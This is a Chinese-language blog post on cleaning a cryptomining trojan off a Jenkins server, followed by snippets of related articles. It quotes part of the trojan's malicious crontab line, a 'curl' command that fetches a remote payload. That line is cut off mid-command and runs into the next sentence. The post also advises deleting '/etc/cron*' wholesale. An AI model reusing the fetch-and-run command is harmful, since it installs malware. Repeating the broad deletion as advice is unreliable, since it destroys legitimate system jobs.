起因:前幾天,開發伺服器的jenkins服務一直會出現偶然性的失敗,編譯**的執行緒經常性被kill掉,需要啟動好幾次才有機會成功。給開發帶來諸多不便。受不了啦,於是在乙個午飯時間,決定要徹底搞清楚這個問題。解決問題
首先使用top命令,檢視cpu占用。不看不知道啊,看了嚇一跳!cpu占用一直在98-100%之間,但是卻看不到占用大量記憶體的程序,此時感覺到問題應該是被木馬入侵了。
於是crontab-l看了一下,果然有乙個沒見過的定時任務。
*/23 * * * * (curl -fssl -q -o-憑直覺,在搜尋了下1ntrkbc3,果不其然,我並不是天選之子啊。趕緊看看前人的處理方式,總結如下:
1.刪除掉上面的定時任務
2.刪除掉以下檔案
/etc/cron*
/var/spool/cron/root
/usr/local/lib/libdns.so
/etc/ld.so.preload
/bin/dns
/usr/sbin/netdns
/etc/init.d/netdns( /etc/rc.d/init.d/netdns)
/tmp目錄下的陌生檔案
3.再使用top命令,找到占用大量程序的程序,並kill掉
注:刪檔案之前,保險起見可以先做一下備份,避免出現誤刪
一定要將檔案都刪除趕緊之後再刪除程序,因為程序有做相互喚醒,先除根再掃葉
本次出現被挖礦木馬植入的原因,應該是前段時間redis的埠有對外網放開過,大家一定要記得redis埠僅內外訪問或者做加固,不然費力有費心,還費電!
SQL Server伺服器CPU爆高解決
昨天下午,測試反映trunk測試環境的資料庫cpu一直100 一開始以為是病毒,內網這段時間老是有個挖礦的病毒,查了一下被隔離了,但是資料庫還是慢,停掉sql server的服務cpu降下來,啟動ssql server的伺服器就cpu就到100 按照正常情況,sql server導致cpu爆高,一般...
Linux 伺服器被挖礦 CPU或記憶體高負載處理
1.通過linux命令檢視cpu記憶體情況 輸入 top 然後按1 對資源占用進行排序2.檢視資源佔比較高的程序是否本系統的程序 如果是本系統程序,根據業務系統確定為什麼會這樣,可能是訪問量過大 死迴圈 定時任務高頻執行 excle大量資料匯入 等情況 如果非本系統程序,則繼續往下看3.首先進行ki...
伺服器被挖礦木馬攻擊該怎麼處理
正月裡來是新年,剛開始上班我們sine安全團隊,首次挖掘發現了一種新的挖礦木馬,感染性極強,穿透內網,自動嘗試攻擊伺服器以及其他 通過我們一系列的追蹤,發現了攻擊者的特徵,首先使用thinkphp遠端 執行漏洞,以及ecshop getshell漏洞,phpcms快取寫入漏洞來進行攻擊 通過 許可權...